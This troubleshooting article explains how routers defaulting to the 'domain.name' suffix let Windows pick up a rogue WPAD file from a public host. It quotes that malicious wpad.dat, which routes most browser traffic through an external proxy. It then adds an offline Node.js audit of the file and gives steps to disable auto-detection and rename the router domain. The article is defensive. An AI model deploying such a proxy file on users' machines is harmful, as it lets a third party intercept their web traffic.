Windows 7/10 Troubleshooting: Why is the operating system applying network settings that I have not configured? WPAD attack?

Introduction

I managed to come across one of these cases (written in Russian), and I would like to share it with you.

Some users have encountered strange behavior. They started to notice that the computer was using strange proxy settings. 

Also, when they ping wpad, they get a weird response:

C:\Users\Me>ping wpad
Pinging wpad.domain.name 185.38.111.1 with 32  bytes of data:
Reply from  185.38.111.1: bytes=32  time=76ms TTL=48
Reply from  185.38.111.1: bytes=32  time=77ms TTL=48
Reply from  185.38.111.1: bytes=32  time=76ms TTL=48
Reply from  185.38.111.1: bytes=32  time=78ms TTL=48

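As far as I managed to understand, many routers have the following domain name by default: domain.name.
It turns out that this domain name is real, and it contains some strange settings (which some antiviruses have marked as malicious) that Windows 7/10 automatically accepts and applies. Because Windows appends the router-supplied DNS suffix when it looks up wpad, the query becomes wpad.domain.name, as the ping output above shows, and it resolves to a host on the internet instead of a host on the local network.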

Some users also noticed that if you enter the address http://wpad/wpad.dat in the browser, it returns:

function FindProxyForURL(url, host) {
if (isPlainHostName(host) ||
dnsDomainIs(host, ".windowsupdate.com") ||
dnsDomainIs(host, ".microsoft.com") ||
dnsDomainIs(host, ".baidu.com") ||
dnsDomainIs(host, ".kaspersky.com") ||
dnsDomainIs(host, ".axaltacs.net") ||
dnsDomainIs(host, ".live.com") ||
dnsDomainIs(host, ".drivergenius.com") ||
isInNet(host,  "10.0.0.0", "255.0.0.0") ||
isInNet(host,  "172.16.0.0",  "255.255.224.0") ||
isInNet(host,  "192.168.0.0",  "255.255.0.0") ||
isInNet(host,  "127.0.0.0", "255.0.0.0"))
return "DIRECT";
else
return 'PROXY 185.38.111.1:8080';
}

At the time of writing this article, I could not reproduce it; perhaps it only works under certain conditions.
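
To see what a wpad.dat like the one above does to traffic, the following added example (not part of the original article) evaluates a shortened, constructed copy of it offline in Node.js and flags every host that would be sent through a proxy outside the local network. The names `auditPac`, `pacHelpers` and the test hosts are assumptions made for illustration.

```javascript
// Constructed sample: shortened copy of the wpad.dat quoted in this article.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) ||
      dnsDomainIs(host, ".microsoft.com") ||
      isInNet(host, "10.0.0.0", "255.0.0.0") ||
      isInNet(host, "192.168.0.0", "255.255.0.0"))
    return "DIRECT";
  else
    return 'PROXY 185.38.111.1:8080';
}`;

const isIPv4 = (s) => /^(\d{1,3}\.){3}\d{1,3}$/.test(s);
const ipToInt = (ip) => ip.split('.').reduce((n, o) => ((n << 8) | Number(o)) >>> 0, 0);
const inNet = (ip, net, mask) =>
  isIPv4(ip) && ((ipToInt(ip) & ipToInt(mask)) >>> 0) === ((ipToInt(net) & ipToInt(mask)) >>> 0);

// Minimal stand-ins for the PAC built-ins this file uses. isInNet accepts only
// literal IPv4 hosts (no DNS lookup), which keeps the audit fully offline.
const pacHelpers = {
  isPlainHostName: (host) => !host.includes('.'),
  dnsDomainIs: (host, domain) => host.toLowerCase().endsWith(domain.toLowerCase()),
  isInNet: inNet,
};

// Private and loopback IPv4 ranges; a proxy outside them is off the local network.
const LOCAL_NETS = [['10.0.0.0', '255.0.0.0'], ['172.16.0.0', '255.240.0.0'],
  ['192.168.0.0', '255.255.0.0'], ['127.0.0.0', '255.0.0.0']];
const isLocal = (ip) => LOCAL_NETS.some(([net, mask]) => inNet(ip, net, mask));

// Evaluate the PAC for each host and flag decisions that proxy through a public IPv4.
// new Function is not a sandbox: load untrusted PAC text only on a disposable analysis machine.
function auditPac(pacSource, hosts) {
  const names = Object.keys(pacHelpers);
  const findProxy = new Function(...names, `${pacSource}\nreturn FindProxyForURL;`)(
    ...names.map((n) => pacHelpers[n]));
  return hosts.map((host) => {
    const decision = String(findProxy(`http://${host}/`, host));
    const proxies = [...decision.matchAll(/\b(?:PROXY|SOCKS5?|HTTPS?)\s+([^\s;:]+):\d+/gi)]
      .map((m) => m[1]);
    return { host, decision, suspicious: proxies.some((p) => isIPv4(p) && !isLocal(p)) };
  });
}

for (const r of auditPac(SAMPLE_PAC, ['intranet', 'update.microsoft.com', '192.168.1.10', 'bank.example'])) {
  console.log(`${r.host.padEnd(22)} ${r.decision}${r.suspicious ? '   <-- public proxy' : ''}`);
}
```

Only the hosts on the file's exclusion list go direct; every other destination is handed to the external proxy, which is the behaviour to look for when reviewing an unexpected wpad.dat.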

Solution:

1) Permanently disable the proxy server and "Automatically detect settings" in the browser.

  • From Internet Explorer's top menu, click Tools > Internet Options.

  • From the Connections tab, locate the desired connection, then click Settings.
    Click LAN settings (lower-right corner).

  • Ensure the following settings are disabled (unchecked), then click OK:

      • Automatically detect settings

      • Use automatic configuration script

      • Use a proxy server for this connection

2) Change the domain name on the router from **domain.name** to **domain.local** (or some other name, for example my.router) and reload it.